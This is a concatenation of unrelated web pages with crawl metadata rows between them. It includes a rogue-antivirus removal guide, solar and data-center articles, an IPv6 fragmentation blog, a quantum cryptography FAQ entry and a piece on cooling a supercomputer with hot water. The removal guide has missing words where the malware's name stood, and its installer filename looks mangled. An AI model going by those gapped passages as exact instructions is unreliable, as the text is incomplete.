Using the arrow keys on your keyboard, select Safe Mode with Networking and press Enter on your keyboard. If you are having trouble entering safe mode, then please use the following tutorial: How to start Windows in Safe Mode
Windows will now boot into safe mode with networking and prompt you to login as a user. Please login as the same user you were previously logged in with in the normal Windows mode. Then proceed with the rest of the steps.
- It is possible that the infection you are trying to remove will not allow
you to download files on the infected computer. If this is the case, then
you will need to download the files requested in this guide on another computer
and then transfer them to the infected computer. You can transfer the files
via a CD/DVD, external drive, or USB flash drive.
- Before we can do anything we must first end the processes that belong to
so that it does not interfere with the cleaning procedure. To do this, please
download RKill to your desktop from the following link.
RKill Download Link - (Download page will open in a new tab or browser window.)
When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.
- Once it is downloaded, double-click on the iExplore.exe
icon in order to automatically attempt to stop any processes associated with
and other Rogue programs. Please be patient while the program looks for various
malware programs and ends them. When it has finished, the black window will
automatically close and you can continue with the next step. If you get a
message that RKill is an infection, do not be concerned. This message is just
a fake warning given by
when it terminates programs that may potentially remove it. If you run into
these infections warnings that close RKill, a trick is to leave the warning
on the screen and then run RKill again. By not closing the warning, this typically
will allow you to bypass the malware trying to protect itself so that RKill
. So, please try running RKill until the malware is no longer running. You
will then be able to proceed with the rest of the guide. Do not reboot
your computer after running RKill as the malware programs will start again.
If you continue having problems running RKill, you can download the other renamed versions of RKill from the RKill download page. Both of these files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.
- At this point you should download Malwarebytes Anti-Malware, or MBAM, to scan your computer for any any infections or adware that may be present. Please download Malwarebytes from the following
location and save it to your desktop:
Malwarebytes Anti-Malware Download Link (Download page will open in a new window)
- Once downloaded, close all programs and Windows on your computer, including
- Double-click on the icon on your desktop named mb3-setup-1878.1878-22.214.171.1249.exe.
This will start the installation of MBAM onto your computer.
- When the installation begins, keep following the prompts in order to continue
with the installation process. Do not make any changes to default settings
and when the program has finished installing, make sure you leave Launch
Malwarebytes Anti-Malware checked. Then click on the Finish button. If MalwareBytes prompts you to reboot, please do not do so.
- MBAM will now start and you will be at the main screen as shown below.
Please click on the Scan Now button to start the scan. If there is an update available for Malwarebytes it will automatically download and install it before performing the scan.
- MBAM will now start scanning your computer for malware. This process can
take quite a while, so we suggest you do something else and periodically
check on the status of the scan to see when it is finished.
- When MBAM is finished scanning it will display a screen that displays any malware that it has detected. Please note that the infections found may be different
than what is shown in the image below due to the guide being updated for newer versions of MBAM.
You should now click on the Remove Selected button to remove all the seleted malware. MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.
- You can now exit the MBAM program. If Malwarebytes did not prompt you to reboot your computer, please do so that you are back in normal mode.
- As many rogues and other malware are installed through vulnerabilities found
in out-dated and insecure programs, it is strongly suggested that you use
Secunia PSI to scan for vulnerable programs on your computer. A tutorial on
how to use Secunia PSI to scan for vulnerable programs can be found here:
How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector
Your computer should now be free of the Antivirus Protection Trial program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes Anti-Malware to protect against these types of threats in the future. | <urn:uuid:008e8718-48aa-4bd4-9c6b-91bc7b56988d> | CC-MAIN-2017-04 | https://www.bleepingcomputer.com/virus-removal/remove-antivirus-protection | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00543-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.910151 | 2,031 | 2.59375 | 3 |
The US Department of Energy today said it was conditionally committing $2 billion to develop two concentrating solar power projects that it says will offer 500 megawatts of power combined, effectively doubling the nation's currently installed capacity of that type of power.
Concentrated solar systems typically use parabolic mirrors to collect solar energy. Other methods include system such as a power tower that uses directed mirrors to concentrate the sun's rays onto a solar receiver at the top of a tall tower. Google in fact recently invested $168 million in such a system.
More on energy projects: 10 hot energy projects that could electrify the world
The new projects are both located in California: the Mojave Solar Project (MSP) in San Bernardino County and the Genesis Solar Project in Riverside County. The projects will both sell power to Pacific Gas and Electric.
According to the DOE, when operational, the 250MW Mojave Solar Project will avoid over 350,000 metric tons of carbon dioxide annually and is anticipated to generate enough electricity to power over 53,000 homes.
The site will be the first US utility-scale deployment of the project's vendor, Abengoa Solar's Solar Collector Assembly (SCA). The SCA's features include a lighter, stronger frame designed to hold parabolic mirrors that are less expensive to build and install. The SCA heat collection element uses an advanced receiver tube to increase thermal efficiency by up to 30% percent compared to the nation's first CSP plants, the DOE states. In addition, the advanced mirror technology will improve reflectivity and accuracy. Together, these improvements can permit the collection of the same amount of solar energy from a smaller solar field. Unlike older CSP plants, the Mojave system will operate without fossil fuel back-up systems for generation during low solar resource periods, according to the DOE.
The 250MW Genesis Solar Project meanwhile, will feature scalable parabolic trough solar thermal technology that has been used commercially for more than two decades. The project is expected to avoid over 320,000 metric tons of carbon dioxide emissions annually and produce enough electricity to power over 48,000 homes, the DOE stated. NextEra Energy in the primary vendor on the project.
Follow Michael Cooney on Twitter: nwwlayer8
Layer 8 Extra
Check out these other hot stories: | <urn:uuid:8fd93161-6fdc-46ae-844f-02e164af5ae6> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2229487/infrastructure-management/energy-dept--spends--2b-to-double-us-concentrated-solar-power-capacity.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00083-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916591 | 467 | 3.078125 | 3 |
More data centers are making their way underground. Colocation and data center providers such as Iron Mountain, Cavern Technologies and InfoBunker are already operating underground data centers, taking advantage of natural cooling and protection from the elements. However, are underground data centers a coming trend or a novelty? Is it time for data center providers to dig in and start putting their servers and computing hardware underground? What options should solution providers recommend to customers?
First, let’s consider the changes in operational costs for today’s data centers. The greatest costs of data center operations remain those of cooling and the power associated with cooling. Operating chillers to provide a consistently cool operating temperature remains one of the biggest line items in the data center operating budget. An IDC survey of 404 enterprise data center managers (each with at least 1,000 square feet and 100 servers) reports that power and cooling costs, along with IT infrastructure costs, each make up about 24 percent of the operating budget.
So how does moving underground affect operating costs and efficiencies? Let’s assess some of the variables.
It’s Cool to Be Underground
The primary reason to migrate data centers underground is natural cooling. Rather than powering up chillers to maintain a cool operating temperature 24/7, underground facilities maintain a naturally cooler, unchanging ambient temperature. Cavern Technologies, for example, says that its underground facility in Lenexa, Kansas, which is built in an abandoned limestone mine, maintains a consistently cool operating temperature of 68 degrees.
The operational challenge for any underground data center is bleeding off the excess heat. Underground facilities have air conditioning for comfort, but excess heat from the servers usually has to be vented through holes drilled to the exterior. The Underground, an Iron Mountain facility in a repurposed limestone mine in Pennsylvania, maintains a constant temperature of 55 degrees, and Iron Mountain executives say that the limestone walls of the mine act as a heat sink, absorbing up to 1.5 BTUs per hour per square foot. Most underground facilities, however, need some kind of heat management strategy.
Location, Location, Location
Then, of course, there are power considerations. Even if you don’t need a lot of energy to power chillers, you still need reliable power to run the equipment. This is where things can become expensive.
Rather than digging out an underground data center, most companies use natural or preexisting underground locations, such as abandoned military bunkers, mines or caverns. Most of these preexisting underground locations are in isolated areas, where power may not be available. Because you can’t “bring the mountain to Mohammed,” you have to bring a reliable power source to the data center, which drives construction costs up.
You have the same issues regarding reliable network connections. Because underground data centers tend to be remote, you also have to bring in fiber and high-speed networking to provide connectivity. One of the reasons to go underground is to eliminate weather as a risk factor, so to minimize climate risk, you should put cable underground as well, which will increase construction and maintenance costs.
When considering an underground data center location, you need to balance the cost savings from construction (you already have a hole in the ground) with the cost of power and connectivity. You may be saving on the cost of chillers while increasing the cost of delivering power and infrastructure access.
Is It Worth It?
There are some real advantages to taking a data center underground, but there are other considerations beyond cooling and power that could present obstacles. What about personnel? Is the underground data center in a location where you can attract skilled IT professionals to maintain the facility? What about external support systems? You won’t be able to install everything underground, so you want to be able to accommodate generators, climate control systems and other units housed outside the facility. All of these factors could add to overall construction and operating costs.
There also are new technologies and strategies that are solving the same problems that underground data centers solve, specifically cooling and power, but at much lower costs. Most of these cooling techniques can be retrofitted into existing data centers.
Hot-aisle and cold-aisle strategies, for example, have been around for some time and use airflow to facilitate cooling while reducing costs. Some estimate that savings in cooling costs from hot-aisle containment can be as high as 43 percent, without having to build a new data center. Hot-aisle designs have become more sophisticated and less expensive, making them a viable alternative for saving on operating costs.
Water-based data center cooling is another strategy that is gaining popularity. Water has 50 to 1,000 times the capacity of air to remove ambient heat, which makes it more efficient for equipment cooling. So, rather than building data centers underground, others are experimenting with underwater data centers and floating data centers. A less radical approach is using water-cooled racks for high-density computing, which can be easily installed in an existing data center.
While data centers may be ready to move underground, do you really need to? There are alternative cooling technologies available today that resellers can offer to customers to retrofit into their existing data centers. Cold-aisle and water-based cooling strategies are more effective and reduce energy costs, and you don’t have to move the operation to a bunker or a cave. | <urn:uuid:2d759c57-2853-4b05-8fa7-032d40790549> | CC-MAIN-2017-04 | http://www.ingrammicroadvisor.com/data-center/is-it-finally-time-to-build-an-underground-data-center | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00479-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933245 | 1,097 | 2.53125 | 3 |
Fragmentation has been a frequent source of security vulnerabilities in IPv4, and for good reason. With fragmented IPv4 packets, the layer 4 header information is not available in the second through the last fragment. The process of fragmentation and fragment reassembly can create unexpected and harmful behaviors in intermediate nodes (such as firewalls and routers) and end nodes (such as user computers). In this blog, I will discuss how fragmentation is implemented in IPv6 and how it varies from IPv4 fragmentation.
If there is one myth about IPv6 that otherwise clueful engineers have clung to, it is the misconception that packets cannot be fragmented in IPv6. This is only partially true. Intermediate devices, such as routers and firewalls, cannot fragment a packet, but the source node can fragment packets. As such, end nodes and intermediate nodes must know how to properly handle fragmented packets.
There are two primary concerns when a packet is fragmented in IPv6. First, fragmentation requires the use of the Fragment extension header, which shifts the byte offset of the layer 4 header 8 bytes deeper into the packet, so nodes must know how to locate the layer 4 header. Second, as in IPv4, only one fragment will contain the layer 4 header (typically the first fragment, although there are scenarios where it can appear in the second). The remaining fragments will not contain the layer 4 header, so an intermediate device must either correlate the layer 4 information from the fragment that does contain it with the other fragments, or forward those fragments without any knowledge of the layer 4 information for the packet they belong to.
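To make that 8-byte shift concrete, here is a minimal sketch of decoding the Fragment extension header. Python is our choice here, not something from the original post, and the sample bytes are invented; the field layout itself follows RFC 2460.

```python
import struct

FRAG_HDR_LEN = 8  # the Fragment extension header is always 8 bytes

def parse_ipv6_fragment_header(ext_hdr: bytes) -> dict:
    """Decode an IPv6 Fragment extension header (RFC 2460, Section 4.5).

    Layout: Next Header (1 byte), Reserved (1 byte), a 16-bit field
    holding the 13-bit Fragment Offset plus 2 reserved bits and the
    M ("more fragments") flag, then a 32-bit Identification value.
    """
    next_header, _reserved, frag_field, ident = struct.unpack(
        ">BBHI", ext_hdr[:FRAG_HDR_LEN]
    )
    return {
        "next_header": next_header,             # e.g. 6 = TCP, 17 = UDP
        "offset_bytes": (frag_field >> 3) * 8,  # offset counts 8-octet units
        "more_fragments": bool(frag_field & 0x1),
        "identification": ident,
    }

# Invented sample: a first fragment (offset 0) that carries the TCP header.
print(parse_ipv6_fragment_header(bytes.fromhex("0600000154c3a1b2")))
```

Only the fragment with offset 0 can carry the layer 4 header, so a middlebox that wants layer 4 visibility has to key on the identification field to correlate the remaining fragments.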
Unlike in IPv4, because intermediate nodes cannot fragment IPv6 packets, it is essential that the source node either send packets no larger than the maximum transmission unit (MTU) of the network path or break them into fragments no larger than the path MTU.
Path MTU Discovery (PMTUD) is nice to have in IPv4(1), but PMTUD is crucial in IPv6(2). When an intermediate node receives a packet that is too big for the MTU of the forwarding path, the intermediate node must drop the packet and send an ICMPv6 "packet too big" message back to the source node. Since an intermediate node cannot fragment an IPv6 packet, it is critical that intermediate nodes allow the "packet too big" messages from other intermediate nodes to be forwarded. If the node sourcing the large packets does not receive the "packet too big" message, there is a considerable risk that the source node will continue to transmit packets that will be dropped before they reach their destination. IETF RFC 4890 provides additional details on ICMPv6 filtering recommendations(3).
If the source node does not perform PMTU discovery, it must send packets no larger than the minimum IPv6 MTU size of 1,280 bytes. Some Internet-based services eliminate PMTU discovery problems by sourcing IPv6 packets with an MTU of 1,280 bytes(4). At the cost of not being able to transit larger packets, sending IPv6 packets no larger than 1,280 bytes ensures that the packet will not be dropped because it is too large to be transited across a network path and the source does not need to rely upon a “packet-too-big” ICMPv6 message. The approach of setting the MTU to 1,280 bytes by default is safe, but, as found during World IPv6 Day, is also controversial(5).
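The arithmetic the source node performs when it fragments is straightforward. The sketch below is a hypothetical example rather than code from any real stack: the 40-byte IPv6 header and 8-byte Fragment header sizes come from the specification, and every fragment except the last must carry a multiple of 8 octets because the offset field counts 8-octet units.

```python
IPV6_HDR = 40        # fixed IPv6 header
FRAG_HDR = 8         # Fragment extension header
IPV6_MIN_MTU = 1280  # the minimum link MTU IPv6 guarantees

def fragment_offsets(payload_len: int, path_mtu: int = IPV6_MIN_MTU):
    """Compute (offset, length, more_fragments) tuples for source-side
    fragmentation. Every fragment except the last must carry a multiple
    of 8 octets, because the offset field counts 8-octet units."""
    if path_mtu < IPV6_MIN_MTU:
        raise ValueError("IPv6 links must support an MTU of at least 1280")
    max_chunk = (path_mtu - IPV6_HDR - FRAG_HDR) // 8 * 8
    frags, offset = [], 0
    while offset < payload_len:
        chunk = min(max_chunk, payload_len - offset)
        frags.append((offset, chunk, offset + chunk < payload_len))
        offset += chunk
    return frags

for frag in fragment_offsets(3000):  # 3,000-byte payload, 1,280-byte MTU
    print(frag)  # (0, 1232, True), (1232, 1232, True), (2464, 536, False)
```

A conservative stack that skips PMTUD can simply always compute against the 1,280-byte default, which is exactly the trade-off described above.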
Fragmentation in IPv6 neighbor discovery has also caused some concern recently because of its potential use as an evasion technique for RA-Guard(6). A solution that has been proposed is elimination of all extension headers in neighbor discovery packets(7).
(1) IETF RFC 1191, "Path MTU Discovery," Mogul, J. and Deering, S., November 1990.
(2) IETF RFC 1981, "Path MTU Discovery for IP version 6," McCann, J., Deering, S. and Mogul, J., August 1996.
(3) IETF RFC 4890, “Recommendations for Filtering ICMPv6 Messages in Firewalls,” Davies, E and Mohacsi, J, May 2007.
(4) IETF RFC 2460, “Internet Protocol, Version 6 (IPv6) Specification,” Deering, S and Hinden, R, December 1998.
(5) See discussion on the IPv6 operations e-mail list: http://lists.cluenet.de/pipermail/ipv6-ops/2011-June/005755.html
(6) Internet-Draft, “IPv6 Router Advertisement Guard (RA-Guard) Evasion,” Gont, F, May 31, 2011, http://tools.ietf.org/id/draft-gont-v6ops-ra-guard-evasion-00.txt
(7) Internet-Draft, “Security Implications of the Use of IPv6 Extension Headers with IPv6 Neighbor Discovery,” Gont, F, May 31, 2011, http://tools.ietf.org/id/draft-gont-6man-nd-extension-headers-00.txt | <urn:uuid:1e6213a5-7831-4e73-aeea-02e6c4a58cf3> | CC-MAIN-2017-04 | https://www.arbornetworks.com/blog/asert/ipv6-fragmentation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00479-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.855328 | 1,133 | 3.21875 | 3 |
Behavior of different cover crops in a network of on-farm trials [Verhalten verschiedener Zwischenkulturen in einem Netzwerk von on-farm-versuchen] [Comportamento di diverse colture intermedie in una rete di esperimenti on-farm]
Amosse C.,Institut für Pflanzenbauwissenschaften (IPB) |
Dugon J.,AGRIDEA |
Chassot A.,AGRIDEA |
Courtois N.,AgriGeneve |
And 11 more authors.
Agrarforschung Schweiz | Year: 2015
A network of experimental fields in northern and western Switzerland was used to better understand the behavior of various cover crops under diversified environmental conditions. Several species were oriented towards soil cover in autumn (e.g. brown mustard). Others produced an important aerial biomass (e.g. sunflower). Some, with intermediate performance during autumn, had a good soil cover at the end of winter, such as black oat. Multifactorial analysis allowed us to clarify the relationship between cover crop performance and environmental and agronomical constraints. We identified positive correlations between soil cover in autumn and the cumulative precipitation in the 10 days before sowing, or intermediate tillage before cover crop sowing. Aerial biomass of cover crops at the time of the first frost was correlated with soil texture: lighter soils were more suitable for high aerial development. No species combined all the advantages expected from cover crops throughout the fallow period, but species mixtures offer the best opportunities. © 2015 A M T R A - Association pour la Mise en Valeur des Travaux de la Recherche Agronomique. All rights reserved. Source | <urn:uuid:723979dc-09ee-4558-bb82-b7579d75d71b> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/fondation-rurale-interjurassienne-297817/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00203-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.862445 | 372 | 2.59375 | 3 |
7.18 What is quantum cryptography?
Quantum cryptography [BBB92] [Bra93] is a method for secure key exchange over an insecure channel based on the nature of photons. Photons have a polarization, which can be measured in any basis, where a basis consists of two directions orthogonal to each other, as shown in Figure 7.1.
If a photon's polarization is read in the same basis twice, the polarization will be read correctly and will remain unchanged. If it is read in two different bases, a random answer will be obtained in the second basis, and the polarization in the initial basis will be changed randomly, as shown in Figure 7.2.
The following protocol can be used by Alice and Bob to exchange secret keys (a small simulation sketch follows the list).
- Alice sends Bob a stream of photons, each with a random polarization, in a random basis. She records the polarizations.
- Bob measures each photon in a randomly chosen basis and records the results.
- Bob announces, over an authenticated but not necessarily private channel (for example, by telephone), which basis he used for each photon.
- Alice tells him which choices of bases are correct.
- The shared secret key consists of the polarization readings in the correctly chosen bases.
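The protocol above is easy to simulate classically. The sketch below is a toy model in Python, not part of the original FAQ: each photon is a (bit, basis) pair, measuring in the wrong basis yields a coin flip and collapses the photon into the measuring basis, and an optional intercept-resend eavesdropper can be switched on.

```python
import secrets

def measure(photon, basis):
    """Measure a (bit, basis) photon. Same basis: the stored bit comes out
    and the state is unchanged. Different basis: the outcome is random and
    the photon collapses into the measuring basis with that outcome."""
    bit, prep_basis = photon
    if basis == prep_basis:
        return bit, (bit, prep_basis)
    out = secrets.randbelow(2)
    return out, (out, basis)

def bb84(n=2000, eavesdropper=False):
    rand_bits = lambda: [secrets.randbelow(2) for _ in range(n)]
    alice_bits, alice_bases = rand_bits(), rand_bits()  # 0 = "+", 1 = "x"
    photons = list(zip(alice_bits, alice_bases))

    if eavesdropper:  # intercept-resend attack
        photons = [measure(p, b)[1] for p, b in zip(photons, rand_bits())]

    bob_bases = rand_bits()
    bob_bits = [measure(p, b)[0] for p, b in zip(photons, bob_bases)]

    # Sifting: keep only the positions where Bob guessed Alice's basis.
    keep = [i for i in range(n) if alice_bases[i] == bob_bases[i]]
    alice_key = [alice_bits[i] for i in keep]
    bob_key = [bob_bits[i] for i in keep]
    errors = sum(a != b for a, b in zip(alice_key, bob_key))
    return len(alice_key), errors

print("no eavesdropper:", bb84())                     # ~n/2 sifted bits, 0 errors
print("with eavesdropper:", bb84(eavesdropper=True))  # ~25% of sifted bits differ
```

Without Eve the sifted keys match exactly; with Eve roughly a quarter of the sifted bits disagree, which is precisely what the check described next detects.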
Quantum cryptography has a special defense against eavesdropping: if an enemy measures the photons during transmission, he will use the wrong basis about half the time, and thus will change some of the polarizations. As a result, Alice's and Bob's sifted keys will disagree (in roughly a quarter of the positions for this simple intercept-resend attack). As a check, they can compare some random bits of their key using an authenticated channel. They will therefore detect the presence of eavesdropping, and can start the protocol over.
There has been experimental work in developing such systems by IBM and British Telecom. For information on quantum computing (which is not the same as quantum cryptography), see Question 7.17.
- 7.1 What is probabilistic encryption?
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- 7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:e14b5170-e379-4f99-a867-1a00da3ff926> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-quantum-cryptography.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00505-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.915026 | 682 | 3.59375 | 4 |
As a technology company, Gradwell is fascinated by the digital world and how telecommunications have progressed since the development and adoption of computers. Experts argue that the very first digital communication goes as far back as the telegraph system at least a century before the internet we all know and love. It’s also fairly obvious that computer science has rapidly developed internet technology since the first packet-switching papers in the 1960s, but we could be here all day talking about that period in history. The core of what drives it all goes as far back as 1679 when historians suggest Gottfried Leibniz identified the binary number system, which is the basis for binary code. And we all know the base of computer data is binary (well, there are some translators and other bits involved).
So, it is all maths, measurements and calculations. We’re not telling you anything you didn’t learn in school; however, the thought did prompt us to think about maths in general. Maths wasn’t always the most interesting lesson at school for some of us. Plenty of daydreams were enjoyed whilst the teacher scribbled various equations on the board, stating that, ‘One day these will come in handy’. Did we believe that phrase? Most of us never gave it a second thought. However, whether you were a fan at school or not, maths is all around us, in every decision we make, in every action we take.
When you get up in the morning the first thing you do is look at the time on your phone, see numbers that help you then calculate how long you have to shower, get dressed and swallow some breakfast before you leave the house in time to get to work. It’s not only time we think about but measuring temperature too – we open the curtains to check the weather (sun might equate to a short-sleeved shirt in the office, whereas ice could add another five minutes to your journey) and hopping into a cool shower rather than waiting the extra minute for it to heat up gives you that tiny little lie-in in the morning.
On your journey to work you might be stuck in slow traffic and watch the clock as the minutes tick by whilst you get later and later. You’re also mentally calculating the driving distance to work, navigating spatial decisions between cars and of course, if you’d calculated your journey just a bit differently you might already be sitting at your desk, hands clasped around that perfectly measured and steaming cup of coffee. It’s all down to the numbers with a bit of learned behaviour thrown in the mix.
Fast forward to mid-morning and you’re ticking tasks off of your daily to do list. Prioritising your work is often done so based upon the importance of the task, but mentally it’s a 1, 2, 3 and 4 process to get there. ‘This one will only take me five minutes so I’ll finish that off before I nip to the kitchen to get another glass of water.’ Or ‘well, I’ve got a meeting in an hour so if I really focus between now and then I can get two reports done and dusted if I keep an eye on the time.’ Measuring time is so basic that we don’t even know we’re doing it.
That mid-morning meeting has arrived and no doubt there is at least one mention of an update on performance metrics and you’ll have to show more numbers to identify how things are going in your team.
Lunch has finally arrived and what do you do? Weigh up situations and options based on numbers – a five-minute, one-mile walk to the local convenience store might save you money and give you longer to relax on your break, but it will result in a soggy sandwich and stale crisps. On the flip side, approach your sixty-minute allotted break a little differently and you might find yourself enjoying a longer stroll to a cosy nearby pub, then measuring how many people are there to decide if you can tuck into a tasty pie and chips with your colleagues. Then again, the second option will set you back probably triple what the soggy sandwich costs. Again – it’s all about equations!
Your working day has come to an end so you’re out of the door and racing to your car to try and set off as quickly as possible to beat the traffic. Once you’re home there are more equations at home: measurements and recipes to follow for dinner, trying to squeeze in one more episode of your favourite TV show before bed and, last of all, calculating how much sleep you can get as you reset the alarm on your phone. Then it all starts again the next morning.
How is all of this relevant to what we do here at Gradwell? Without getting more philosophical about what it all means or discussing the mysteries of life, our daily routines consist of a series of equations – that’s the way we live our lives and it’s also the way we do our work. We rely on technology like phones, computers and the internet now but how did all of those things start? It’s simple: numbers, equations and calculations on a piece of paper (or old tablets…nothing like today’s digital notebooks) that grew, changed and evolved over the years to bring us the technological breakthroughs that now enhance our lives.
For more information about how Gradwell can help make your working day a little bit more stress free and efficient using modern technology for connectivity, visit our website at http://www.gradwell.com. | <urn:uuid:58bd5fd3-d298-4521-8c40-51c612ab4318> | CC-MAIN-2017-04 | https://www.gradwell.com/2015/02/12/its-all-about-the-numbers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00047-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956089 | 1,171 | 2.953125 | 3 |
The University of Tromso (UiT), the "Arctic University of Norway", is the world’s northernmost university, with four campuses spread out across Norway. UiT is already a leader in High Performance Computing (HPC). In 2007 its STALLO cluster became the most powerful cluster in Norway and reached 63rd position in the Top500. In 2014 STALLO 2 is expected to reach 310 teraflops of peak performance.
UiT’s innovative thinking includes using its supercomputing cluster as a heating plant. Specifically, the waste heat from the High Performance Computing facility is the energy source for building and district heating, reducing overall campus energy demand.
“Recently we have moved our attention from counting how many flops we can get out of the supercomputer to how many watts that can be recycled from the same computer” says Svenn Hanssen, Head of Section Research and Educational IT, University of Tromso
UiT believes that hot water cooling is something that gives the Arctic region an advantage and positions the region as a natural place to establish future datacenters. With an average temperature of 4ºC, UiT is an ideal location for re-use of waste heat from data centers. Cutting millions of kroner from the power bill means more money can be spent on computing, software and the actual research. Waste heat recovery is also key in UiT’s goal to become the world’s leader in Green HPC.
During the summer of 2014 UiT will complete the build of a new 2 MW data center. Its supercomputing cluster is expected to be around two-thirds cooled by hot water, with the longer-term goal of making the entire cluster water cooled. The system will use the exit water from cooling the supercomputer as a heat source for the nearby buildings, and a later phase will expand this to also provide heat to the hospital next door. The hot water will be used to heat the structures via both wall and ceiling radiators.
UiT began installing Asetek’s RackCDU D2C™ hot water data center liquid cooling in January 2014 with the goal of using the supercomputing cluster as a district heat plant. The RackCDU D2C system consists of two key subsystems: D2C™ server coolers that are drop-in replacements for the CPU air heat sinks in each server, and a RackCDU extension that mounts on the back of each rack. Asetek D2C server coolers bring low-pressure, hot water inside the computing nodes to directly cool high heat flux components such as CPUs, GPUs and memory.
The RackCDU Extension is a 263mm (10.5 inch) cabinet that contains a zero-U rack level Cooling Distribution Unit (hence RackCDU) that exchanges heat between the cooling liquid running through the servers and the liquid in the larger facilities liquid cooling / waste heat recovery loop. Hot cooling liquid moves between RackCDU and server coolers via tubes that attach with dripless quick connectors to the RackCDU and via blind mate connectors to the server coolers. The server cooler, connecting tubes and RackCDU are all delivered pre-filled with coolant. Data center operators never have to deal with server cooling liquid.
RackCDU enables much higher rack densities, reduces the overhead power requirements for data center cooling, lowers acoustic noise and enables the use of waste heat to be recouped for building and district heating.
Hot water cooling is highly effective since the surface temperature of a CPU (case temp) only needs to be maintained between 67°C and 85°C (153°F to 185°F), depending on CPU model. The operating surface temperatures for memory chips, GPUs and co-processors are even higher, in the 90°C to 95°C (194°F to 203°F) range. The cooling efficiency of water allows it to maintain the required case temps with a low initial temperature difference between the water and the component being cooled, or a small delta T. This means the water used for cooling the components can be hot. RackCDU D2C is deployable as part of completely new clusters, in server refresh cycles or even as retrofits of existing servers. In particular, it can be implemented in many standard air-cooled servers offered by OEMs today, just as UiT is doing with its HP SL230 servers.
UiT chose to concentrate on D2C cooling of CPUs in the HP SL230 servers used in their HPC cluster. Air-cooled HP SL230s are a popular choice in the HPC world, and RackCDU D2C allows these cost-effective nodes to run more efficiently through liquid cooling while enabling high-density deployments and substantial power savings.
To make best use of the waste heat a number of factors must be optimized. UiT is manipulating a range of parameters for optimization: flow rates, amount of hot water needed, the temperature of the water, the delta between the supply and return temperature and the size of the supercomputer in terms of possible production of hot water.
Initial testing has shown it is possible to achieve greater than 70% waste heat recycling with a delta of 25°C between the input and exit temperatures of the cooling water. The testing to date has been with a rather cold 12°C supply temperature, and performance is expected to be even better at higher input temperatures. Air temperature in the computer room is also a factor. UiT has found that as they increase the room temperature, the water-cooled system performance is not affected. Conversely, the air-cooled systems start to spend more power for cooling as room temperature rises.
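The recoverable heat follows directly from the loop's flow rate and temperature delta via Q = m_dot * cp * dT. In the sketch below (Python, for illustration only) the 25°C delta matches the figure reported above, while the 400 L/min flow rate is purely an assumed example.

```python
WATER_CP = 4186.0  # J/(kg*K), specific heat of water
WATER_RHO = 1.0    # kg/L, close enough at these loop temperatures

def recovered_heat_kw(flow_l_per_min: float, delta_t_c: float) -> float:
    """Heat carried by the facility loop: Q = m_dot * cp * dT."""
    m_dot = flow_l_per_min * WATER_RHO / 60.0      # kg/s
    return m_dot * WATER_CP * delta_t_c / 1000.0   # kW

# Assumed loop: 400 L/min at the 25 C delta reported above.
q = recovered_heat_kw(400, 25)
print(f"{q:.0f} kW of recoverable heat")            # ~698 kW
print(f"{q / 2000:.0%} of the 2 MW facility load")  # ~35%
```

Under these assumptions a single loop already carries roughly a third of the facility's 2 MW design load as usable heat, which is why the cluster can plausibly be treated as a district heating plant.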
Because it is an HPC computing cluster, a 100% server load is common. The UiT load is typically greater than 80% 24 hours per day/7 days a week, making it ideal for heat capture and reuse.
One of the side effects of moving to hot water cooling and implementing district heating at UiT is the shift in how the supercomputing resource is viewed. No longer is the supercomputer seen as a multi-million dollar yearly expenditure in terms of variable power costs. It is now actually something the whole university expects to be expanded and integrated into the infrastructure to provide heating as well as power cost savings. Indeed, the visibility has built such enthusiasm that there are even artists trying to hook the supercomputer up to new art installations on campus to give different perspectives to the artwork based on the real-time load of the system.
